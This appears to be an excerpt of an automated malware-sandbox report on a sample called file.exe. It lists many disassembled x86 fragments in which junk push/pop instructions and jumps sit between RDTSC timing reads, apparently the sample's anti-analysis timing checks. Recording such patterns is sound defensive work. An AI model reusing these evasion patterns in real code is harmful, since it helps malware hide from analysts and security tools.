                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83440 second address: B83446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83446 second address: B8344A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8344A second address: B83473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE784B99A2Eh 0x00000010 jmp 00007FE784B99A30h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81EE7 second address: B81EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8218E second address: B821C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007FE784B99A26h 0x0000000d pop ecx 0x0000000e jmp 00007FE784B99A34h 0x00000013 jmp 00007FE784B99A32h 0x00000018 popad 0x00000019 push edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8261E second address: B8264A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE784D2BEBFh 0x0000000a jmp 00007FE784D2BEBAh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jc 00007FE784D2BEC2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8264A second address: B82650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B827B9 second address: B827BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82948 second address: B82969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FE784B99A34h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82969 second address: B8298E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE784D2BEC3h 0x0000000a pushad 0x0000000b js 00007FE784D2BEB6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8298E second address: B8299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82AD8 second address: B82AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82AE1 second address: B82B00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007FE784B99A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE784B99A2Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82B00 second address: B82B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82C4C second address: B82C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D97 second address: B82DD9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE784D2BEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE784D2BEC7h 0x0000000f pushad 0x00000010 push edx 0x00000011 jmp 00007FE784D2BEC6h 0x00000016 pop edx 0x00000017 je 00007FE784D2BED5h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D00 second address: B86D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A2Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D17 second address: B86D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D1D second address: B86D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B555 second address: B8B559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4271C second address: B42725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42725 second address: B42747 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FE784D2BEC4h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42747 second address: B4274D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4274D second address: B42751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42751 second address: B2A7D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jne 00007FE784B99A32h 0x0000000f call dword ptr [ebp+12449F4Ch] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE784B99A2Dh 0x0000001d jmp 00007FE784B99A30h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42920 second address: B4292E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4292E second address: B42933 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42BE3 second address: B42BE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42C63 second address: B42CA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007FE784B99A3Eh 0x0000000e jmp 00007FE784B99A38h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jnl 00007FE784B99A2Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42CA2 second address: B42CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42CA6 second address: B42CB4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42CB4 second address: B42CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B430F6 second address: B4312F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000004h 0x00000008 call 00007FE784B99A2Dh 0x0000000d mov dword ptr [ebp+122D2D4Eh], esi 0x00000013 pop edi 0x00000014 nop 0x00000015 jp 00007FE784B99A32h 0x0000001b push eax 0x0000001c jbe 00007FE784B99A3Ah 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AA84 second address: B8AA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AA88 second address: B8AA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AA8C second address: B8AA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AA92 second address: B8AA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8ABF3 second address: B8AC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD73 second address: B8AD77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD77 second address: B8AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE784D2BEBDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD8E second address: B8AD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD92 second address: B8AD98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD98 second address: B8AD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AF18 second address: B8AF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AF20 second address: B8AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007FE784B99A26h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AF2D second address: B8AF48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE784D2BEC2h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B0BA second address: B8B0CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B0CA second address: B8B0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEBDh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B915A2 second address: B915B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B915B0 second address: B915C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784D2BEBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91175 second address: B9117F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE784B99A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B967ED second address: B967F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE784D2BEB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96B22 second address: B96B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE784B99A36h 0x0000000a jmp 00007FE784B99A35h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007FE784B99A26h 0x0000001b popad 0x0000001c jmp 00007FE784B99A31h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96FD4 second address: B96FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE784D2BEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007FE784D2BEB6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43347 second address: B43351 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE784B99A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43351 second address: B4335E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4335E second address: B43368 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43368 second address: B433AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D1BFEh], ebx 0x0000000f pushad 0x00000010 movsx ebx, cx 0x00000013 jmp 00007FE784D2BEBBh 0x00000018 popad 0x00000019 push 00000004h 0x0000001b sub dword ptr [ebp+12448556h], edx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE784D2BEC8h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43557 second address: B435D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FE784B99A28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 or dword ptr [ebp+12449F85h], edi 0x0000002a push 0000001Eh 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FE784B99A28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 xor edx, 63E41A92h 0x0000004c nop 0x0000004d push edx 0x0000004e push edi 0x0000004f jmp 00007FE784B99A31h 0x00000054 pop edi 0x00000055 pop edx 0x00000056 push eax 0x00000057 jc 00007FE784B99A2Eh 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9725B second address: B97261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97261 second address: B97281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE784B99A38h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97281 second address: B97297 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FE784D2BEB6h 0x00000010 jng 00007FE784D2BEB6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97297 second address: B972A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B972A3 second address: B972CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FE784D2BEC7h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007FE784D2BEB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97B96 second address: B97B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B461 second address: B9B465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B465 second address: B9B469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B469 second address: B9B498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE784D2BEBBh 0x0000000b jne 00007FE784D2BEC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B498 second address: B9B4B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE784B99A2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B4B0 second address: B9B4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9FC33 second address: B9FC3D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F730 second address: B9F734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F734 second address: B9F73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F73C second address: B9F754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F754 second address: B9F770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE784B99A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FE784B99A2Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8002 second address: BA8007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8007 second address: BA8011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE784B99A26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6097 second address: BA60AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEBFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA697D second address: BA6982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6982 second address: BA699B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA699B second address: BA699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA699F second address: BA69A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA69A5 second address: BA69AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6C46 second address: BA6C6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE784D2BEC6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6C6A second address: BA6C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A2Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6C7C second address: BA6C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6C80 second address: BA6C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE784B99A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6F0C second address: BA6F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6F12 second address: BA6F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784B99A26h 0x0000000a popad 0x0000000b push edi 0x0000000c jnp 00007FE784B99A26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB57A second address: BAB59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FE784D2BEC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jo 00007FE784D2BEB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABBE8 second address: BABC19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A31h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FE784B99A39h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABC19 second address: BABC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE784D2BEB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FE784D2BEBCh 0x00000015 rdtsc
